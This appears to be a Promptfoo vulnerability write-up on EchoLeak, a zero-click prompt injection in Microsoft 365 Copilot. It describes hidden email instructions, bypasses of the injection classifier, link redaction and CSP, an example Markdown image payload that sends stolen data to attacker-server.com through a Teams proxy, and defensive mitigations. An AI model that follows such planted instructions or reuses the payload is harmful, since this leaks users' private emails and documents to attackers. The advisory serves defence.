EchoLeak Zero-Click Data Exfiltration
Research Paper
EchoLeak: The First Real-World Zero-Click Prompt Injection Exploit in a Production LLM System
Description: A zero-click indirect prompt injection vulnerability, CVE-2025-32711, existed in Microsoft 365 Copilot. A remote, unauthenticated attacker could exfiltrate sensitive data from a victim's session by sending a crafted email. When Copilot later processed this email as part of a user's query, hidden instructions caused it to retrieve sensitive data from the user's context (e.g., other emails, documents) and embed it into a URL. The attack chain involved bypassing Microsoft's XPIA prompt injection classifier, evading link redaction filters using reference-style Markdown, and abusing a trusted Microsoft Teams proxy domain to bypass the client-side Content Security Policy (CSP), resulting in automatic data exfiltration without any user interaction.
Examples: An attacker sends an email containing hidden instructions disguised as normal text to a victim. The instructions are designed to be triggered when Copilot summarizes or processes the email.
The instructions coerce Copilot into generating a response containing a Markdown image. This payload bypasses link-stripping defenses by using reference-style syntax and bypasses the Content Security Policy by using a trusted Microsoft Teams domain as a proxy to reach the attacker's server. The sensitive data is appended to the URL as a parameter.
When the victim's client (e.g., Outlook, Teams) renders Copilot's response, it automatically attempts to fetch the image, sending the sensitive data to the attacker's server.
Example payload generated by the compromised Copilot:
Project summary is ready. See details below.
![image alt text][ref]
[ref]: https://asyncgw.teams.microsoft.com/urlp/v1/url/content?url=https://attacker-server.com/log?data=[SENSITIVE_DATA_EXTRACTED_BY_COPILOT]
Impact: Successful exploitation allows a remote, unauthenticated attacker to exfiltrate sensitive data accessible to the victim's Copilot instance, including the contents of private emails, documents, and chats. The attack is zero-click, requiring no user interaction beyond Copilot processing the malicious email, and achieves a full bypass of the LLM's trust boundaries, escalating the privileges of an external attacker to those of the internal user.
Affected Systems: Microsoft 365 Copilot services prior to the server-side fix deployed in May 2025.
Mitigation Steps:
- Strict Prompt Partitioning: Enforce a hard separation between trusted content (e.g., user queries) and untrusted content (e.g., external emails) within the LLM's prompt. Tag data by its source and instruct the model not to execute commands from untrusted sources.
- Enhanced Input/Output Filtering: Strip or neutralize potentially malicious syntax from inputs and outputs, specifically including reference-style Markdown links and all URLs originating from untrusted domains.
- Strict Content Security Policy (CSP): Apply a strict CSP to the rendering surface to prevent loading resources from non-allowlisted domains. Disallow image embeds (img-src) from all but essential, trusted origins and harden any allowlisted proxy endpoints against being used as open redirects.
- Principle of Least Privilege for AI: Restrict the model's access by default. Use provenance-based access control to prevent the AI from combining data across different trust boundaries (e.g., do not use content from an external email to answer a query about an internal project).
- Output Validation: Treat all model outputs as untrusted. Scan outputs for sensitive data patterns, PII, credentials, and suspicious URLs before rendering them to the user. Block or require user consent for any outbound network requests embedded in the response.
© 2025 Promptfoo. All rights reserved.